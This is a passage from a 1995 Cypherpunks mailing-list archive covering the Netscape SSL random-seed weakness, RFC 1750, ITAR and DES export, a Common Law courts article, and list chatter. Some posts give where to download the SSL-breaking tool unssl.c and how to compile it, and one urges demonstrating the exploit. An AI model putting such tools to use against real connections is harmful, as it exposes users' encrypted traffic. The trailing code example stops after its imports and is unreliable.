25, 1995. A Law of Their Own: Extremists create do-it-yourself courts. One day last month Wichita District Attorney Nola Foulston looked at her copy of the Daily Record, a trade newspaper, and was stunned to read that she had been subpoenaed. She was ordered to appear in District Court and produce her license to practice law. If she failed to appear, the sheriff would be directed to arrest her. Her alleged crime: holding public office. 
The subpoena was an unofficial document drafted and filed by a local man who had been charged with a misdemeanor for burning trash without a permit. Angered by the government interference, he joined a growing number of disgruntled Americans who think they've found a better arbiter of justice. He went to a "Common Law court," one of the latest incarnations of the extremist right. Foulston ignored the subpoena. "I don't practice in false courts," she says. But they're growing. Common Law courts have sprung up in at least 11 states in the farm belt and the West over the last year, organized by a cross section of people bent on directly challenging government. In living rooms, bingo halls and convention centers, dozens gather weekly to form juries, present evidence and issue kangaroo-court indictments, liens, arrest warrants -- and even death sentences. None of this has the force of law. The movement is based on a mixture of crackpot conspiracy theories and bizarre interpretations of the U.S. Constitution, the Bible and the Magna Charta. In brief, its leaders preach that Franklin Delano Roosevelt's "bank holiday" edict of 1933, which temporarily shut down the nation's banks, stripped the country of its safeguards against tyranny. "When you get to digging into what's going on today, you have a government operating outside the Constitution," says David Schechter, a court organizer. Court members keep in touch on the Internet, swapping information, posting meetings and organizing court sessions. They also vent their views in a Texas magazine called the AntiShyster. Mostly white men form Common Law courts; many come from the militia movement. Some are closely aligned with white-supremacy and anti-Jewish groups. "The basic idea behind the movement," says University of Oregon history professor Richard Brown, "is 'popular sovereignty,' that people are above the law. These people are alienated from the legal system.
To some extent it sounds like they're also trying to settle personal scores." Nuisance filings: At times, the movement spills out of its bogus courts and into real ones. Followers have tied up courts and IRS offices with thousands of pages of nuisance filings. Common Law court "marshals" have even burst into federal courtrooms wearing official-looking badges and uniforms to serve their papers. Last year in Garfield County, Mont., 36 men and women formed a Common Law court and briefly occupied a courthouse. Another court offered $1 million bounties for the arrest of local officials and threatened to hang them. Garfield County Attorney Nick Murnion charged some members of the Common Law court with "criminal syndicalism," alleging that the group had advocated acts of violence for political purposes. One court member was sentenced to 10 years in prison. Others received smaller sentences. Some members try to use the rump courts to reverse real ones. Favorite targets are divorce decrees and foreclosure notices. "People who don't want to or can't pay their bills are turning to something that tells them they don't have to," says Kansas City attorney Berry F. Laws III, who has been targeted by Common Law courts because he forecloses on farm mortgages for the Farmers Home Administration. This is a serious business, but it has elements of unintended burlesque. William Ellwood of Columbus, Ohio, joined up after his small business collapsed and he found that he still owed the Internal Revenue Service $5,100. Frustrated and annoyed, he took to researching the Constitution and concluded that he was living in a land that infringed on his personal liberty. One thing led to another until he found himself ticketed by a police officer for weaving on a highway. His reading of the Constitution made the ticket null and void. "What we're saying," he patiently explains, "is the motor-vehicle laws are laws of commerce. I don't use the laws for private gain, so why do I have to be stopped?"
Ellwood eventually paid the ticket, but not before he and a small group of like-minded citizens reached out to organizer Schechter. Now they meet every Tuesday to have their day in a court of their own making. Thomas Heath in Denver and Connie Leslie ----- From norm at netcom.com Mon Sep 18 07:54:40 1995 From: norm at netcom.com (Norman Hardy) Date: Mon, 18 Sep 95 07:54:40 PDT Subject: Netscape SSL implementation is broken! Message-ID: At 9:29 PM 9/17/95, Perry E. Metzger wrote: >Christian Wettergren writes: >> I guess we should send them the draft-ietf-security-randomness-00.txt >> asap. > >I thought that was an RFC by now. > >Perry It is! RFC 1750. From adam at homeport.org Mon Sep 18 08:10:04 1995 From: adam at homeport.org (Adam Shostack) Date: Mon, 18 Sep 95 08:10:04 PDT Subject: Good random seeds Message-ID: <199509181510.LAA01802@homeport.org> Since we can all see how badly time works, I'd like to point out that Will Price, author of the excellent Cryptdisk utility for the Mac, uses mouse movements to seed his PRNG. His code is available for a small fee, and I'd strongly suggest that people who need good, easy PRNs take a look at it, and also take a long look at RFC1750, randomness recommendations for security (or something like that.) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dl at hplyot.obspm.fr Mon Sep 18 08:15:16 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Mon, 18 Sep 95 08:15:16 PDT Subject: Anonymous WWW proxy Alpha release available In-Reply-To: <199509181421.KAA01875@panix.com> Message-ID: <9509181514.AA16343@hplyot.obspm.fr> Duncan Frissell writes: > Thanks. What we now need is a proxy located in the US with good connections > for performance. yes ! yes ! anyone with tcl-dp and tclX installed to run one ? we need to have a 'network' of proxies ! [maybe I shall 'translate' the prototype in perl or C...
but I'm much more used to Tcl than Perl, and Tcl writing is infinitely faster than C for web tasks] > Does anyone know a good test page that reads back the info > your browser is putting out so you can test proxies? http://hplyot.obspm.fr:8001/ shows what has been sent to it by the browser (among other www goodies) [You can put the following
---8<---
#! /bin/sh
# CGI response header: plain-text body, then the blank line that ends the headers
echo "Content-type: text/plain"
echo ""
# dump the CGI environment (HTTP_USER_AGENT, REMOTE_ADDR, HTTP_REFERER, ...) as the body
/bin/env
---8<---
as a minimal debugging cgi too, on any httpd, if you want] regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: one hundred five thousand one hundred five billion one hundred five thousand one hundred sixty-seven From hallam at w3.org Mon Sep 18 08:35:49 1995 From: hallam at w3.org (hallam at w3.org) Date: Mon, 18 Sep 95 08:35:49 PDT Subject: Code of Law In-Reply-To: <199509181425.HAA13003@infinity.c2.org> Message-ID: <9509181534.AA10941@zorch.w3.org> >Another >court offered $1 million bounties for the arrest of local >officials and threatened to hang them. Garfield County >Attorney Nick Murnion charged some members of the Common >Law court with "criminal syndicalism," alleging that the >group had advocated acts of violence for political >purposes. One court member was sentenced to 10 years in >prison. Others received smaller sentences. This sort of thing can become very dangerous very quickly. In the UK there was a publicity-seeking shyster who decided to make a political career out of attacking a book he didn't like. The authorities didn't want to risk getting involved so they let the guy go round calling for the author to be murdered. He has been in hiding since the Ayatollah issued a death threat. >"The basic idea behind the movement," says >University of Oregon history professor Richard Brown, "is >'popular sovereignty,' that people are above the law. >These people are alienated from the legal system. To some >extent it sounds like they're also trying to settle >personal scores."
Sounds like they don't like the democracy so they are setting up their own lynch law. It doesn't sound all that different from fascism. First they start saying that a group of people are evil, once they have convinced each other that this is the case they take the logical next step of murdering them. Another reason why we need cryptography, to protect ourselves against such self-appointed lynch mobs. Phill H-B From rsalz at osf.org Mon Sep 18 09:23:10 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Sep 95 09:23:10 PDT Subject: Netscape's random numbers Message-ID: <9509181622.AA15284@sulphur.osf.org> Congrats, nice job! The Netscape license explicitly prohibits decompiling (except where such prohibition is illegal). When this hits the media it will be important to avoid being tarred with the "hacker breaks rules and breaks in" brush. More subtly, it's probably a bad idea to call into question the overall business model of client binaries on the net. Instead, emphasize importance of open code, public reviews, ability to link in your own code that meets public specs, etc. All of these things the Internet was designed to do, and U.S. ITAR regulations are designed to prohibit (globally, anyway). And also that the bad guys will never play by the rules. And re-emphasize that solutions are possible, just that the U.S. government prevents them from being deployed in a global economy. Perhaps draw parallels to the recent Microsoft Word virus. /r$ From tbyfield at panix.com Mon Sep 18 09:28:13 1995 From: tbyfield at panix.com (t byfield) Date: Mon, 18 Sep 95 09:28:13 PDT Subject: Joe Sixpack and his TV Message-ID: At 9:20 PM 9/17/95, Black Unicorn wrote: >As I understand it shows like "The X-Files" don't accept unsolicited >scripts. Not surprising as I'm sure they have writer's agreements. And, given how popular the show is, I doubt their *writers* even accept unsolicited *phone calls*.
In principle, the idea of working on positive media exposure is a good one; in practice, it'll likely be mostly dangerous, since there's no way to guarantee a pro-crypto slant when anticrypto slants will widely be seen as making for better "drama." Any number of soap writers would bite a crypto hook if someone took the time to contact them--except on shows like that secrets are *bad* (e.g., So-and-so is suspected of Murdering Whoever for Financial Reasons, but refuses to give up the Password to his Encrypted Files, so Some Chick Seduces him and slips an Invisible Keystroke Capture Program, written by her Little Hacker Brother, onto his computer to Reveal the Ugly Truth). The news programs won't be much better, since reporters, being a suspicious lot, tend to dislike secrets too. Maybe try the Simpsons, hey? I see it all now: Bart encrypts Homer and forgets the password. As far as the family's concerned, the blob of random friction that sits around watching TV and drinking beer is fine, but Homer's boss starts to worry that Homer's looking a bit unkempt... ted From steven at echonyc.com Mon Sep 18 09:29:15 1995 From: steven at echonyc.com (Steven Levy) Date: Mon, 18 Sep 95 09:29:15 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <199509181408.KAA02406@echonyc.com> Message-ID: It's my impression that the play was staged a few years after my book came out in 1984 (though I chose the title in 1982). I remember reading the reviews then, and they didn't seem to mention that it was a revival of a years-old play whose name I had unintentionally used for my own book. (Unlike the case for the current movie, whose screenwriter seemed to know of my own book.) If you have evidence that the play was indeed produced before 1984, please let me know. Otherwise, I'd be happy to accept your apology, Peter. On Mon, 18 Sep 1995, Peter Trei wrote: > > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > > >very cyberpunk.
The ad campaign even uses the tag line, "Their only crime > > >is curiosity." > > > It may not be a crime, but it's not nice to steal a title. > > You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? > I saw this (in an Off-Off-Broadway production), years before your book came > out. > > > > > Peter Trei > Senior Software Engineer > Purveyor Development Team > Process Software Corporation > http://www.process.com > trei at process.com > From jgrubs at left.webcasters.com Mon Sep 18 09:29:26 1995 From: jgrubs at left.webcasters.com (Jim Grubs W8GRT) Date: Mon, 18 Sep 95 09:29:26 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? Message-ID: hallam at w3.org writes: > > >Should there be an "alt.cypherpunks" type of newsgroup instead of this > >mailing list? > > Bad idea, it would simply mean that every kook on USEnet would add > alt.cypherpunks onto the crossposting line. We would have black helicopters, > loons, Waco Wako's, Loonytarians and turkish government propaganda spamming > forever. Hey, create the alt. group and let it draw the kooks. Nobody said WE have to read it. We can stay here as usual... -- WebCasters(tm) James C. Grubs jgrubs at left.webcasters.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programming, Information brokering From unicorn at polaris.mindport.net Mon Sep 18 09:47:11 1995 From: unicorn at polaris.mindport.net (Black Unicorn) Date: Mon, 18 Sep 95 09:47:11 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <199509181421.KAA01808@panix.com> Message-ID: On Mon, 18 Sep 1995, Duncan Frissell wrote: > At 08:33 AM 9/15/95 -0700, Charles Lewton wrote: > > >Not quite squashed, Duncan. Bullet placement (poor by some standards) > >is all that prevented Mr. Weaver from croaking like his unfortunate wife. > >She is said to have "pissed off" the feds but was not charged with a > >single actionable item yet she remains quite dead. 
> > > >Unless I have missed something somewhere, no TLA is concerned in the slightest > >with individual liberty. That notion should keep a rational person awake > >nights. > > > >Chuck > > > > In response to Chuck and Lucky, I can only say that the Weavers suffered 57% > casualties (4/7) and 28% KIA (2/7). The Feds suffered .25% KIA (1/400). I > don't think any Feds were merely wounded. > > They brought murder charges against two members of the group and lost. Careful here, they lost because the FBI refused to cooperate with the prosecutor. It was looking like an open-and-shut case before this. > They settled wrongful death suits for $3.1 million. They also lost > the publicity war. They had to change their procedures because of Ruby > Ridge and Waco. Actually, they just reinforced the old policy, which had been degrading in practice for quite a long while in the case of Ruby Ridge. > They energized the opposition. > > The casualties were unfortunate but when facing force ratios of 57/1 or > better, the outcome has to be considered a major victory for Randy Weaver. Considering the limited rules of engagement (i.e. low intensity sniper conflict only) I don't think you can really take 57/1 as a force ratio of meaningful impact. > The case is a demonstration of modern conflicts in which litigation and > publicity count as much as guns. On that field, the Feds don't hold all the > cards. On this I agree with you. > > DCF > > "The libertarian and conservative coalition of the 'Right' is a > low-maintenance coalition because its members mostly want to be left alone > while the special interest group coalition of the 'Left' is a > high-maintenance coalition because all of its members need to be given a > vast dose of government cash daily." > > > --- "In fact, had Bancroft not existed, Franklin might have had to invent him." potestas scientiae in usu est (the power of knowledge lies in its use)
in nihilum nil posse reverti (nothing can return to nothing) 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From perry at piermont.com Mon Sep 18 09:51:36 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 18 Sep 95 09:51:36 PDT Subject: Netscape Navigator 2.0 will implement secure e-mail In-Reply-To: Message-ID: <199509181651.MAA00479@frankenstein.piermont.com> Eric Young writes: > On 18 Sep 1995, Jeff Weinstein wrote: > > The implementation guide recommends using rc2-cbc 40-bit for content > > encryption when there is no way to determine the capabilities of the > > recipient. When you do know what the recipient can do, it recommends > > using RC2-CBC with a longer key or DES-CBC. > > Hmm.... notice the use of a non public cipher as the base cipher.... > what a shame.... It's also a shame that they aren't sticking to MOSS, which is the open IETF standard for such stuff. Perry From sameer at c2.org Mon Sep 18 09:58:40 1995 From: sameer at c2.org (sameer) Date: Mon, 18 Sep 95 09:58:40 PDT Subject: Netscape SSL implementation cracked! In-Reply-To: <199509180527.BAA28782@frankenstein.piermont.com> Message-ID: <199509181652.JAA23706@infinity.c2.org> > > Anyway, congratulations to you and Dave on an excellent piece of > work. I say a bunch of us should buy you "I broke Netscape's security > and all I got was this lousy T-Shirt" shirts, if only someone would > design them! > If someone would design them (i'll see if my graphic designer is up to the task, but he's on vacation right now), Community ConneXion will make/fund them.
-- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From danisch at ira.uka.de Mon Sep 18 09:58:44 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Mon, 18 Sep 95 09:58:44 PDT Subject: Explaining Zero Knowledge to your children Message-ID: <9509181655.AA06115@elysion.iaks.ira.uka.de> > Clever, but I think it's missing an important element of zero knowledge > interactive proof systems. For example, why not simply open _both_ hands? That's the same problem as with the cave: Why not just go into the left passage and come out of the right passage. Both are absolute proofs. If you have two identical bills you must be able to copy them. In a cryptographic proof there is always the chance to guess. The chance is sometimes 50%, sometimes very small. What about this idea: Alice is caught in a dark room somewhere in the world. She doesn't know where she is, but there is a telephone in the room and she calls Bob to ask him where she is. Bob claims to know it but doesn't want to reveal it. He calls her back. When the phone is ringing, he has proven the knowledge of her phone number, but she still doesn't know where she is or how he could know. And there is still the chance that Bob has guessed the number. Mmmh, Hadmut From trei at process.com Mon Sep 18 10:00:05 1995 From: trei at process.com (Peter Trei) Date: Mon, 18 Sep 95 10:00:05 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: <9509181659.AA22457@toad.com> > It's my impression that the play was staged a few years after my book > came out in 1984 (though I chose the title in 1982). I remember reading > the reviews then, and they didn't > seem to mention that it was a revival of a years-old play whose name I had > unintentionally used for my own book. (Unlike the case for the current > movie, whose screenwriter seemed to know of my own book.)
If > you have evidence that the play was indeed produced before 1984, please > let me know. Otherwise, I'd be happy to accept your apology, Peter. > > On Mon, 18 Sep 1995, Peter Trei wrote: > > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > > > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > > > >is curiosity." > > > It may not be a crime, but it's not nice to steal a title. > > You mean, like you stole it from Dale Luck's (duck at mit oz) stage play of the same name? > > I saw this (in an Off-Off-Broadway production), years before your book came > > out. If I'm wrong (and I would not be surprised - I'm relying on fuzzy memories here), please consider my abject apology tendered. Namespace collisions seem to happen quite frequently in titles. I can remember when TMC made a big deal out of their intention to air "Brainstorm", the 1983 film with Natalie Wood. I settled down to watch, and up came a black and white movie with a totally different plot - it turned out they had been sent the 1965 film of that name, and no one had checked. Looking in the (ex)Cardiff film database, I note that there is now a 3rd movie of the title (1994). A couple weeks ago my daughter was making a big deal about wanting to watch "The Red Shoes" on Disney. I was thinking of the 1948 ballet movie, and told her I didn't think she'd like it. She insisted, and it turned out to be a 30 minute (and charming in a cloying sort of way) cartoon.
Peter Trei
Senior Software Engineer
Purveyor Development Team
Process Software Corporation
http://www.process.com
trei at process.com

From rsalz at osf.org Mon Sep 18 10:12:30 1995
From: rsalz at osf.org (Rich Salz)
Date: Mon, 18 Sep 95 10:12:30 PDT
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
Message-ID: <9509181711.AA15476@sulphur.osf.org>

This seems to be

/* Sofware DES functions
 * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
 * the 1977 public-domain program by Jim Gillogly
 * Modified for additional speed - 6 December 1988 Phil Karn
 * Modified for parameterized key schedules - Jan 1991 Phil Karn

Would someone from outside the US try to download the above file? It would be, at least, amusing if an Air Force site were in violation of the ITAR (their README notwithstanding).

/r$

From goedel at tezcat.com Mon Sep 18 10:32:48 1995
From: goedel at tezcat.com (Dietrich J. Kappe)
Date: Mon, 18 Sep 95 10:32:48 PDT
Subject: Netscape's random numbers
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

>Congrats, nice job!

Yes, well done.

>The Netscape license explicitly prohibits decompiling (except where such
>prohibition is illegal). When this hits the media it will be important
>to avoid being tarred with the "hacker breaks rules and breaks in" brush.
>More subtly, it's probably a bad idea to call into question the overall
>business model of client binaries on the net.
>
>Instead, emphasize importance of open code, public reviews, ability to
>link in your own code that meets public specs, etc. All of these things
>the Internet was designed to do, and U.S. ITAR regulations are designed
>to prohibit (globally, anyway). And also that the bad guys will never
>play by the rules. And re-emphasize that solutions are possible, just
>that the U.S. government prevents them from being deployed in a global
>economy.

Before we go to the news, perhaps we should demonstrate the exploitation of this hole.
It would certainly make selling this story a whole lot easier.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMF27PHIf3YegbdiBAQGI7AJXY5d2Su52MWXrh6tP20vOai/Rsbd6+oqx
urWUP34wPv5dqMv1Mw6XDlstX5Q3KmOMeTOjAwcjuJXY5Z3RhkL0gi0nMBUS/IdZ
b/GN
=vhHo
-----END PGP SIGNATURE-----

Dietrich Kappe   | Red Planet http://www.redweb.com
Red Planet, LLC  | "Chess Space" | "MS Access Products" | PGP Public Key
1-800-RED 0 WEB  | /chess        | /cobre               | /goedel/key.txt
Web Publishing   | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84

From jim at acm.org Mon Sep 18 10:48:58 1995
From: jim at acm.org (Jim Gillogly)
Date: Mon, 18 Sep 95 10:48:58 PDT
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509181711.AA15476@sulphur.osf.org>
Message-ID: <199509181748.KAA17616@mycroft.rand.org>

> Rich Salz writes:
> This seems to be
> /* Sofware DES functions
> * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
> * the 1977 public-domain program by Jim Gillogly
> * Modified for additional speed - 6 December 1988 Phil Karn
> * Modified for parameterized key schedules - Jan 1991 Phil Karn
> Would someone from outside the US try to download the above file?
> It would be, at least, amusing if an Air Force site were in violation
> of the ITAR (their README notwithstanding).

Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts us in the same position as Phil Zimmermann, right? Oh -- except that our offenses may already be beyond the statute of limitations.

Jim Gillogly
Trewesday, 27 Halimath S.R. 1995, 17:48

From koontz at MasPar.COM Mon Sep 18 10:56:50 1995
From: koontz at MasPar.COM (David G.
Koontz)
Date: Mon, 18 Sep 95 10:56:50 PDT
Subject: Intellectual Property and Crypto collision
Message-ID: <9509181801.AA06230@argosy.MasPar.COM>

>> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
>> A presidential task force has recommended that electronic transmission of
>> books, magazine articles and software should be classified as copies
>> subject to existing copyright laws. The task force also recommended that
>> it should be illegal to make or distribute products aimed at decoding
>> encrypted software without the consent of the copyright owner.

>Would this make it illegal to produce tools for decrypting key-escrowed
>software? :-)

More importantly, would this firmly extend first amendment protection to electronically transmitted forms?

From cwe at Csli.Stanford.EDU Mon Sep 18 11:23:52 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Mon, 18 Sep 95 11:23:52 PDT
Subject: Netscape SSL implementation is broken!
In-Reply-To:
Message-ID: <199509181823.LAA00950@Csli.Stanford.EDU>

| At 9:29 PM 9/17/95, Perry E. Metzger wrote:
| >Christian Wettergren writes:
| >> I guess we should send them the draft-ietf-security-randomness-00.txt
| >> asap.
| >
| >I thought that was an RFC by now.
| >
| >Perry
|
| It is! RFC 1750.

I should have known, since it was a draft years ago. Ok, you Netscape people, go read RFC 1750! :-)

Btw, I guess my asadi program is full of holes and bugs. Where is a decent 'randomness generator' for a SunOS system?

/Christian

From cwe at Csli.Stanford.EDU Mon Sep 18 11:37:55 1995
From: cwe at Csli.Stanford.EDU (Christian Wettergren)
Date: Mon, 18 Sep 95 11:37:55 PDT
Subject: Code of Law
In-Reply-To: <9509181534.AA10941@zorch.w3.org>
Message-ID: <199509181837.LAA01709@Csli.Stanford.EDU>

| >"The basic idea behind the movement," says
| >University of Oregon history professor Richard Brown, "is
| >'popular sovereignty,' that people are above the law.
| >These people are alienated from the legal system.
| >To some extent it sounds like they're also trying to settle
| >personal scores."

I suddenly got very cold.

I think the world has seen enough of 'revolutionary justice', both in the Soviet Union; there are some fascinating passages of Lenin about avoiding the bourgeois-invented 'justice' concept, and that the revolution was well 'above' that whole thing, and in Germany. And I guess in current China.

When the people and the governing establishment have lost contact this much, you're in for trouble.

(Ok, remember I'm a dumb Swede, who still happens to believe that State and People don't have to be enemies. And I do believe in a sensible dialog between different interest groups etc etc. Flame away, I'm just dumb anyway. ;-))

/Christian

From blane at eskimo.com Mon Sep 18 12:11:50 1995
From: blane at eskimo.com (Brian Lane)
Date: Mon, 18 Sep 95 12:11:50 PDT
Subject: "Hackers"-- brief review and anecdote...
In-Reply-To:
Message-ID:

On Mon, 18 Sep 1995, Steven Levy wrote:

> It's my impression that the play was staged a few years after my book
> came out in 1984 (though I chose the title in 1982). I remember reading
> the reviews then, and they didn't seem to mention that it was a revival
> of a years-old play whose name I had unintentionally used for my own book.
> (Unlike the case for the current movie, whose screenwriter seemed to know
> of my own book.) If you have evidence that the play was indeed produced
> before 1984, please let me know. Otherwise, I'd be happy to accept your
> apology, Peter.

Guys, I think this has gotten a little silly. Trying to claim that anyone 'stole' a single word title is equivalent to Microsoft trying to tell other OS makers that they can't call their graphical frame things 'windows' because they thought of it first. The word 'Hackers' is a description of a group of people.
It means different things to different folks (personally I like the definitions/descriptions in Steven's book) but since it is so widely used I don't see how anyone can claim to have had it stolen from them.

Just as a side note, Steven's book 'Hackers' had a substantial influence on me when I read it, and it holds an honored place among my collection of books.

Brian

------------------------------------------------------------------------------
ftp.eskimo.com/blane          |                    |      www.eskimo.com/~blane
------------------------------------------------------------------------------

From adam at bwh.harvard.edu Mon Sep 18 12:25:17 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Mon, 18 Sep 95 12:25:17 PDT
Subject: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <199509181748.KAA17616@mycroft.rand.org>
Message-ID: <199509181924.PAA09406@bwface.bwh.harvard.edu>

I would expect that as the folks responsible for the FTP site, you could drag the USAF into the lawsuit as a co-defendant, then get the suit against you dropped because of the statute of limitations, leaving the AG investigating the Air Force. :)

Adam

| > Would someone from outside the US try to download the above file?
| > It would be, at least, amusing if an Air Force site were in violation
| > of the ITAR (their README notwithstanding).
|
| Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts
| us in the same position as Phil Zimmermann, right? Oh -- except that our
| offenses may already be beyond the statute of limitations.

-- 
"It is seldom that liberty of any kind is lost all at once."
-Hume

From turner at telecheck.com Mon Sep 18 12:29:14 1995
From: turner at telecheck.com (turner at telecheck.com)
Date: Mon, 18 Sep 95 12:29:14 PDT
Subject: (noise) Re: SPAM bait
In-Reply-To: <199509161913.PAA55049@tequesta.gate.net>
Message-ID: <9509181927.AA18728@TeleCheck.com>

> nobody at alpha.c2.org (Anonymous) wrote:
> >
> >Don't worry, "Janet Dove", or actually sanghi3 at grfn.org got mailbombed
> >severely for this one. I'm just glad he doesn't know how to use remailers.
>
> Good going, Anonymous. What I don't understand about inappropriate
> SPAMs like that one (or telephone ads) is; what's the business
> incentive to do it? I assume that no Cypherpunk has subscribed to
> JMR
>

I'm no lawyer (and probably wouldn't admit to it if I was.. ;) ) but in most states there are laws restricting advertisement wherein the target of the advertising does not have to pay for the privilege of being advertised to. I believe this came about right after FAX machines started taking off, and people were sending out advertisements wasting fax paper and jamming telephone lines. Can't this be applied to the internet? I believe someone sued Visa when he was forced to receive junk e-mail on CompuServe (I think he even won.) Anyone have any info on this?

From hallam at w3.org Mon Sep 18 12:59:21 1995
From: hallam at w3.org (hallam at w3.org)
Date: Mon, 18 Sep 95 12:59:21 PDT
Subject: Netscape's random numbers
In-Reply-To:
Message-ID: <9509181958.AA11906@zorch.w3.org>

>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.

In the first place it is a bit late for that. The problem is all over the net already. Expect press coverage tomorrow or Wednesday.

Secondly I would prefer a solution. Random number generation and maintenance is a whole lot harder than RFC 1750 makes out.
Although that RFC has some useful ideas it does not provide a blueprint for a secure ergodicity management facility.

When I wrote code for Shen I was very careful in the use I made of the output of the ergodicity manager. In particular correlation is a major concern. If a pseudo random output is exposed it must not prejudice other random values. Consider the class of attacks where Mallet receives a message from Alice and uses the knowledge of his random number to discover the random number used in Alice's later message to Bob.

I always use hash functions as a "one way trap" to ensure that values cannot be reverse engineered to discover the internal state of the random number generator. I am also careful to erase all internal state before exiting the program.

Phill Hallam-Baker

From JonathanZ at consensus.com Mon Sep 18 13:07:16 1995
From: JonathanZ at consensus.com (Jonathan Zamick)
Date: Mon, 18 Sep 95 13:07:16 PDT
Subject: RSAREF Commercial Licensing
Message-ID:

Well I've vacillated between making a formal, dry announcement or letting you all know my way. Given the general tenor (and individual spirit) of many on Toad it is pretty easy to guess which path I chose.

So, first of all, here is to a productive future for encryption and encryption technologies. Consensus Development and RSA Data Security have finalized the contract for Consensus to license and support RSAREF(tm) for commercial use.

This isn't an advertisement for RSAREF -- as we are seeking to first present our license to those who have already expressed interest in the product to 'beta-test' our standard agreement. Meanwhile, we would like to gather some information from the net community.

Our foremost concern is for those who have been using RSAREF in the past. If you have discovered any bugs which have either gone unreported or unfixed, we need to know ASAP. No bugs have been officially reported in version 2.0, however we have heard in the past that some may have been found.
If a report has gotten lost during this period of transition, we'd like to know. Consensus' first priority is to make sure RSAREF is bug free.

Secondly, for those who have contributed code to RSAREF in the past, or have code they'd like to submit, send email to me at the address below. Our hope is that RSAREF will continue to improve and meet the needs of its users through the co-support of both Consensus Development and our commercial and non-commercial RSAREF developers.

Lastly, we would like to hear suggestions and ideas on how to improve RSAREF. We intend to remain responsive to requests, and welcome ideas for the evolution of the RSAREF toolkit.

Anyway, again, have a good day. For those who would like to be on our RSAREF announcement list, send mail to with 'Subscribe' in the Subject header.

Note: RSAREF is a trademarked term by RSA Data Security

Thank you all for your patience, I'm sure many will be as excited as I am.

Jonathan Zamick
Knowledge Officer
------------------------------------------------------------------------
..Jonathan Zamick                  Consensus Development Corporation..
..                                 1563 Solano Ave, #355..
..                                 Berkeley, CA 94707-2116..
..                                 o510/559-1500 f510/559-1505..
..Mosaic/WWW Home Page:            ..
..                                 Consensus Home Page ..

From sameer at c2.org Mon Sep 18 13:11:24 1995
From: sameer at c2.org (sameer)
Date: Mon, 18 Sep 95 13:11:24 PDT
Subject: information on SSL brute force hacks wanted
Message-ID: <199509182005.NAA08898@infinity.c2.org>

I'm putting together the hack netscape promotion (I still need to find someone to design the t-shirt) and need to know some information.

1) Who wrote the sslbrute software package and keyserver? Who managed the distributed cracking event?

2) Who broke Hal's first challenge?

Please send me names, email addresses and URLs. If you know of other people who you think deserve recognition for hacking netscape products, contact me.
To see the page while under construction look at http://www.c2.org/hacknetscape -- please don't link to it, as it is obviously under construction.

-- 
sameer                                          Voice:   510-601-9777
Network Administrator                           FAX:     510-601-9734
Community ConneXion: The NEXUS-Berkeley         Dialin:  510-658-6376
http://www.c2.org (or login as "guest")         sameer at c2.org

From perry at piermont.com Mon Sep 18 13:17:50 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Mon, 18 Sep 95 13:17:50 PDT
Subject: Netscape's random numbers
In-Reply-To: <9509181622.AA15284@sulphur.osf.org>
Message-ID: <199509182017.QAA00699@frankenstein.piermont.com>

Rich Salz writes:
> The Netscape license explicitly prohibits decompiling (except where such
> prohibition is illegal).

Which probably is most of the U.S. It would be remarkably stupid for them to try to enforce the provision.

Perry

From iagoldbe at csclub.uwaterloo.ca Mon Sep 18 13:22:52 1995
From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 18 Sep 95 13:22:52 PDT
Subject: unssl.c available for ftp (was: Netscape's random numbers)
In-Reply-To:
Message-ID: <43kkdu$8qa@calum.csclub.uwaterloo.ca>

In article , Dietrich J. Kappe wrote:
>>Congrats, nice job!
>
>Yes, well done.
>
>Before we go to the news, perhaps we should demonstrate the exploitation of
>this hole. It would certainly make selling this story a whole lot easier.
>

Too late. The news (in the form of a call from John Markoff, New York Times) came to Dave and me first thing this morning.

In other news: unssl.c is presently in the /pub/cypherpunks/incoming/ directory on ftp.csua.berkeley.edu. Remember: you must be a "US person" to download it blah blah blah. It will (hopefully) soon move to a more suitable location under /pub/cypherpunks.

The HP on my desk seems to like compiling it with "gcc -O3 -o unssl unssl.c". YMMV.

- Ian "it's now about 1:20 pm PDT; I wonder when it will get exported..."
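[Archive editor's added example, not code from this thread, from Shen or from Cryptdisk: an entropy pool built along the lines Phill Hallam-Baker describes above. Every output passes through a hash "one-way trap" and the pool is hashed forward after each output, so an exposed value prejudices neither the pool nor other outputs; entropy events are credited conservatively, so a few clock reads never count as enough to emit anything; and state is wiped on exit. SHA-256, the 128-bit threshold, the per-event bit credits and the mouse samples are all assumptions of this example.]

```python
import hashlib
import struct
from typing import List, Tuple

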